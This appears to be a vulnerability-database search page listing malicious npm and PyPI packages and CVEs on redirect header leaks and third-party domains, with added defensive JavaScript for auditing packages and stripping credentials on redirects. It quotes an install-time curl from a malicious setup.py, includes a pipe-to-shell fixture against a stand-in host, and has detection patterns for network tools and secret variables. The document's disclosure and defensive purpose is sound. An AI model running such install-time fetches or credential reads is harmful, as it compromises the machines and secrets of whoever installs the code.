Lucene search

26 matches found

OSV
added 2026/05/26 2:20 p.m., 11 views

MAL-2026-4819 Malicious code in token-me-uk (npm)

Per-source details (amazon-inspector, 2a058b653e7a491fdf0c9128b4d2d408c2cdac6a1784adc5f02a0975a0e669eb): The CLI in cli.mjs reads its API key from process.env.TOKENMEUKAPIKEY, falling back to process.env.OPENAIAPIKEY and then process.env.ANTHROPICAPIKEY...

AI score 5.8
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/05/26 1:07 p.m., 15 views

Malicious code in baidubsrc (PyPI)

Per-source details (amazon-inspector, e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd): setup.py executes os.system("curl xiangyangt.com/pypi") unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a...

AI score 6
Exploits: 0, References: 2
OSV
added 2026/05/26 1:07 p.m., 8 views

MAL-2026-4809 Malicious code in baidubsrc (PyPI)

Per-source details (amazon-inspector, e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd): setup.py executes os.system("curl xiangyangt.com/pypi") unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a...

AI score 6
Exploits: 0, References: 2
OSV
added 2026/05/25 5:27 a.m., 11 views

MAL-2026-4754 Malicious code in heims (PyPI)

Per-source details (amazon-inspector, 33e7dda6f116113ebe2bd1ae1ec5238d66f8ada8a87e69a90e49aac1f4eb3f57): The package's WechatUtil.gettoken in src/heims/utils/wechat/wechatutil.py hardcodes a POST to https://token.zhangjianpeng.cn/ with md5appid and...

AI score 5.8
Exploits: 0, References: 1
OSSF Malicious Packages
added 2026/05/23 11:03 p.m., 13 views

Malicious code in openprompt-lang (npm)

Per-source details (amazon-inspector, 24ccd29557423c05fb49b14b0a9a2e1cfbe5a2b69a1276bc76d287edc46f4ec2): On every npm install, openprompt-lang's postinstall hook scripts/postinstall.js:83 executes npm install -g @opencode/cli 2>/dev/null || curl -fsSL...

AI score 5.3
Exploits: 0, References: 11
OSSF Malicious Packages
added 2026/05/20 6:33 p.m., 12 views

Malicious code in cb-wallet-http (npm)

Per-source details (amazon-inspector, e8d704c0a6a48da0e2fef8eddcd1f98e7d380c3e19f22753f3df51d9893f60ce): Package name mimics Coinbase's internal cb-wallet- namespace to capture dependency-confusion resolutions. On npm install postinstall.js and on...

AI score 5.8
Exploits: 0, References: 1
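The six malicious-package entries above share two tells: code that runs at install time (an npm lifecycle script, or a setup.py that shells out, sometimes over plaintext HTTP) and reads of credential-bearing environment variables. The following is an added example, not code from any of the listed packages nor from OSV, OSSF or Amazon Inspector, of a static pre-install check for those tells. The inputs are constructed in memory so it runs offline; the package names, URLs and variable names in the samples are placeholders modelled on the advisory text, not the real ones.

```javascript
// Added example: static audit of a package for install-time execution,
// network access and credential reads. Inputs are in-memory objects.

// npm runs these on `npm install` with no prompt.
const LIFECYCLE_SCRIPTS = ['preinstall', 'install', 'postinstall', 'prepare'];
const NETWORK_TOOL = /\b(curl|wget|fetch|urlopen|requests\.(get|post)|http\.client)\b/;
const PIPE_TO_SHELL = /\|\s*(sh|bash|python3?)\b/;
const ERRORS_SILENCED = /2>\s*\/dev\/null/;
// Python calls that execute a command or arbitrary code during `pip install`.
const PY_EXEC = /\b(os\.system|os\.popen|subprocess\.(run|call|check_call|check_output|Popen)|exec|eval)\s*\(/;
const PLAINTEXT_HTTP = /\bhttp:\/\//;
// Reads of environment variables whose names suggest secrets.
const CREDENTIAL_ENV = /process\.env\.([A-Z0-9_]*(?:KEY|TOKEN|SECRET|PASSWORD)[A-Z0-9_]*)/g;

// pkg = { packageJson?: object, files?: { [path]: text } }
// Returns findings as { where, kind, detail }.
function auditPackage(pkg) {
  const findings = [];
  const add = (where, kind, detail) => findings.push({ where, kind, detail });

  const scripts = (pkg.packageJson && pkg.packageJson.scripts) || {};
  for (const name of LIFECYCLE_SCRIPTS) {
    const cmd = scripts[name];
    if (!cmd) continue;
    add('package.json', 'lifecycle-script', `${name}: ${cmd}`);
    if (NETWORK_TOOL.test(cmd)) add('package.json', 'install-time-network', name);
    if (PIPE_TO_SHELL.test(cmd)) add('package.json', 'pipe-to-shell', name);
    if (ERRORS_SILENCED.test(cmd)) add('package.json', 'errors-silenced', name);
  }

  for (const [path, text] of Object.entries(pkg.files || {})) {
    text.split('\n').forEach((line, i) => {
      const where = `${path}:${i + 1}`;
      if (path.endsWith('setup.py') && PY_EXEC.test(line)) {
        add(where, 'setup-py-exec', line.trim());
        if (NETWORK_TOOL.test(line)) add(where, 'install-time-network', line.trim());
        if (PLAINTEXT_HTTP.test(line)) add(where, 'plaintext-http', line.trim());
      }
      for (const m of line.matchAll(CREDENTIAL_ENV)) add(where, 'credential-env-read', m[1]);
    });
  }
  return findings;
}

// Distinct finding kinds, sorted, for quick triage.
function kinds(pkg) {
  return [...new Set(auditPackage(pkg).map((f) => f.kind))].sort();
}

// Constructed sample shaped like the npm advisories above (placeholder names and URL).
const SAMPLE_NPM = {
  packageJson: {
    name: 'sample-pkg',
    scripts: {
      postinstall: 'npm install -g sample-cli 2>/dev/null || curl -fsSL https://example.invalid/install.sh | sh',
    },
  },
  files: {
    'cli.mjs': 'const key = process.env.SAMPLE_API_KEY || process.env.OPENAI_API_KEY;\n',
  },
};

// Constructed sample shaped like the PyPI advisory above (placeholder URL).
const SAMPLE_PYPI = {
  files: {
    'setup.py': [
      'import os',
      'from setuptools import setup',
      'os.system("curl http://example.invalid/pypi")',
      'setup(name="sample-pkg")',
    ].join('\n'),
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditPackage(SAMPLE_NPM)) console.log('npm ', f.where, f.kind, f.detail);
  for (const f of auditPackage(SAMPLE_PYPI)) console.log('pypi', f.where, f.kind, f.detail);
}
```

Run it against an unpacked tarball before the package is installed (npm pack / pip download, then feed the files in); a lifecycle script alone is not proof of malice, but a lifecycle script that reaches the network, pipes to a shell and hides its errors is worth a manual look every time.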
CVE
added 2025/12/18 7:53 p.m., 7 views

CVE-2019-25228

Kentico Xperience contains an information-disclosure vulnerability where virtual context URLs can be leaked to external domains via the HTTP Referer header during page-builder interactions and loading of links/images. Affected is Kentico Xperience (per CVE-2019-25228 and related records) with ref...

CVSS 5.3, AI score 5.9, EPSS 0.0025
Exploits: 0, References: 2, Affected software: 1
RedhatCVE
added 2025/05/22 10:41 p.m., 7 views

CVE-2022-28649

In JetBrains YouTrack before 2022.1.43563 it was possible to include an iframe from a third-party domain in the issue description...

CVSS 5.4, AI score 6.8, EPSS 0.0038
Exploits: 0, References: 1
OSV
added 2023/07/31 3:15 p.m., 37 views

CVE-2023-38308

An issue was discovered in Webmin 2.021. A Cross-Site Scripting (XSS) vulnerability was discovered in the HTTP Tunnel functionality when handling third-party domain URLs. By providing a crafted URL from a third-party domain, an attacker can inject malicious code, leading to the execution of arbitra...

CVSS 6.1, AI score 6, EPSS 0.00615
Exploits: 1, References: 2
NVD
added 2023/07/31 3:15 p.m., 44 views

CVE-2023-38308

An issue was discovered in Webmin 2.021. A Cross-Site Scripting (XSS) vulnerability was discovered in the HTTP Tunnel functionality when handling third-party domain URLs. By providing a crafted URL from a third-party domain, an attacker can inject malicious code, leading to the execution of arbitra...

CVSS 6.1, AI score 6, EPSS 0.00615
Exploits: 1, References: 2
Vulnrichment
added 2023/07/31 12:00 a.m., 17 views

CVE-2023-38308

An issue was discovered in Webmin 2.021. A Cross-Site Scripting (XSS) vulnerability was discovered in the HTTP Tunnel functionality when handling third-party domain URLs. By providing a crafted URL from a third-party domain, an attacker can inject malicious code, leading to the execution of arbitra...

AI score 6, EPSS 0.00615
Exploits: 1, References: 2
Cvelist
added 2023/07/31 12:00 a.m., 48 views

CVE-2023-38308

An issue was discovered in Webmin 2.021. A Cross-Site Scripting (XSS) vulnerability was discovered in the HTTP Tunnel functionality when handling third-party domain URLs. By providing a crafted URL from a third-party domain, an attacker can inject malicious code, leading to the execution of arbitra...

AI score 6.1, EPSS 0.00615
Exploits: 1, References: 2
RedHat Linux
added 2023/04/12 3:04 p.m., 1 view

node-fetch: exposure of sensitive information to an unauthorized actor

A flaw was found in node-fetch. When following a redirect to a third-party domain, node-fetch was forwarding sensitive headers such as "Authorization," "WWW-Authenticate," and "Cookie" to potentially untrusted targets. This flaw leads to the exposure of sensitive information to an unauthorized...

CVSS 8.8, AI score 7.2, EPSS 0.01646
Exploits: 1, References: 5
RedHat Linux
added 2023/02/06 7:42 p.m., 5 views

node-fetch: exposure of sensitive information to an unauthorized actor

A flaw was found in node-fetch. When following a redirect to a third-party domain, node-fetch was forwarding sensitive headers such as "Authorization," "WWW-Authenticate," and "Cookie" to potentially untrusted targets. This flaw leads to the exposure of sensitive information to an unauthorized...

CVSS 8.8, AI score 7.2, EPSS 0.01646
Exploits: 1, References: 5
RedHat Linux
added 2023/01/09 2:55 p.m., 2 views

node-fetch: exposure of sensitive information to an unauthorized actor

A flaw was found in node-fetch. When following a redirect to a third-party domain, node-fetch was forwarding sensitive headers such as "Authorization," "WWW-Authenticate," and "Cookie" to potentially untrusted targets. This flaw leads to the exposure of sensitive information to an unauthorized...

CVSS 8.8, AI score 7.2, EPSS 0.01646
Exploits: 1, References: 5
RedHat Linux
added 2022/11/17 1:40 p.m., 2 views

node-fetch: exposure of sensitive information to an unauthorized actor

A flaw was found in node-fetch. When following a redirect to a third-party domain, node-fetch was forwarding sensitive headers such as "Authorization," "WWW-Authenticate," and "Cookie" to potentially untrusted targets. This flaw leads to the exposure of sensitive information to an unauthorized...

CVSS 8.8, AI score 7.2, EPSS 0.01646
Exploits: 1, References: 5
OSV
added 2022/04/05 6:15 p.m., 4 views

CVE-2022-28649

In JetBrains YouTrack before 2022.1.43563 it was possible to include an iframe from a third-party domain in the issue description...

CVSS 5.4, AI score 5.8, EPSS 0.0038
Exploits: 0, References: 1
ATTACKERKB
added 2022/04/05 6:15 p.m., 2 views

CVE-2022-28649

In JetBrains YouTrack before 2022.1.43563 it was possible to include an iframe from a third-party domain in the issue description...

CVSS 5.4, AI score 6.1, EPSS 0.0038
Exploits: 0, References: 2, Affected software: 1
Prion
added 2022/03/01 9:15 p.m., 11 views

Design/Logic Flaw

Fluture-Node is an FP-style HTTP and streaming utils library for Node based on Fluture. Using followRedirects or followRedirectsWith with any of the redirection strategies built into fluture-node 4.0.0 or 4.0.1, paired with a request that includes confidential headers such as Authorization or Cookie,...

CVSS 5.8, AI score 6.2, EPSS 0.00815
Exploits: 0, References: 4, Affected software: 1
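The four node-fetch bulletins and the Fluture-Node entry above describe the same client-side bug: an HTTP client follows a redirect to another origin and re-sends Authorization, WWW-Authenticate and Cookie headers to that origin. The following is an added example, not node-fetch's or fluture-node's own code, of a redirect-following client that drops those headers when the redirect leaves the original origin, alongside a switch that reproduces the vulnerable forwarding for comparison. The transport is an in-memory stub with constructed routes standing in for the network, and the host names are placeholders. Origin comparison here is strict (scheme, host and port must all match), which is stricter than treating subdomains of the original host as the same site.

```javascript
// Added example: redirect following with credential headers dropped on a
// cross-origin hop. The transport is stubbed so this runs offline.

const SENSITIVE_HEADERS = new Set(['authorization', 'www-authenticate', 'cookie', 'cookie2']);

// Strict origin check: scheme, host and port must all match.
function sameOrigin(a, b) {
  const ua = new URL(a);
  const ub = new URL(b);
  return ua.protocol === ub.protocol && ua.hostname === ub.hostname && ua.port === ub.port;
}

// Headers to send on the redirected request. Same origin: forward unchanged.
// Different origin: drop anything that carries credentials.
function headersForRedirect(fromUrl, toUrl, headers) {
  if (sameOrigin(fromUrl, toUrl)) return { ...headers };
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    if (!SENSITIVE_HEADERS.has(name.toLowerCase())) out[name] = value;
  }
  return out;
}

// Constructed stub transport: `routes` maps an absolute URL to a response and
// `seen` records every request so a caller can inspect what each host received.
function makeTransport(routes) {
  const seen = [];
  return {
    seen,
    request(url, headers) {
      seen.push({ url, headers: { ...headers } });
      const res = routes[url];
      if (!res) throw new Error('no route for ' + url);
      return res;
    },
  };
}

// Follow redirects. stripOnCrossOrigin=false reproduces the vulnerable
// behaviour; true is the hardened behaviour. Only GET-style redirects are
// modelled (no method or body rewriting on 301/302/303).
function follow(url, headers, transport, { stripOnCrossOrigin = true, maxRedirects = 5 } = {}) {
  let current = url;
  let currentHeaders = { ...headers };
  for (let hop = 0; hop <= maxRedirects; hop++) {
    const res = transport.request(current, currentHeaders);
    const isRedirect = res.status >= 300 && res.status <= 399 && Boolean(res.location);
    if (!isRedirect) return { url: current, status: res.status, hops: hop };
    const next = new URL(res.location, current).href; // Location may be relative
    currentHeaders = stripOnCrossOrigin ? headersForRedirect(current, next, currentHeaders) : currentHeaders;
    current = next;
  }
  throw new Error('too many redirects');
}

// Constructed scenario: the API redirects an authenticated download to a
// third-party CDN. Returns the headers the third party received.
function thirdPartySees(stripOnCrossOrigin) {
  const transport = makeTransport({
    'https://api.example/v1/export': { status: 302, location: 'https://cdn.third-party.example/file' },
    'https://cdn.third-party.example/file': { status: 200 },
  });
  const reqHeaders = { Authorization: 'Bearer s3cr3t', Cookie: 'session=abc', Accept: '*/*' };
  follow('https://api.example/v1/export', reqHeaders, transport, { stripOnCrossOrigin });
  return transport.seen[1].headers;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('forwarded (vulnerable):', thirdPartySees(false));
  console.log('stripped (hardened):  ', thirdPartySees(true));
}
```

The same policy belongs in any client that follows redirects on the caller's behalf, including ones that treat a redirect to a different scheme (https to http) as a downgrade rather than a same-origin hop; the strict comparison above already fails that case because the protocol differs.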
IBM Security Bulletins
added 2022/02/15 2:55 p.m., 21 views

Security Bulletin: IBM InfoSphere Information Server is vulnerable to insecure third party domain access (CVE-2021-29875)

Summary: An insecure third party domain access vulnerability in IBM InfoSphere Information Server was addressed. Vulnerability Details: CVEID: CVE-2021-29875. DESCRIPTION: IBM InfoSphere Information Server could allow an attacker to obtain sensitive information due to an insecure third party domain...

CVSS 7.5, AI score 6.7, EPSS 0.01109
Exploits: 0, Affected software: 1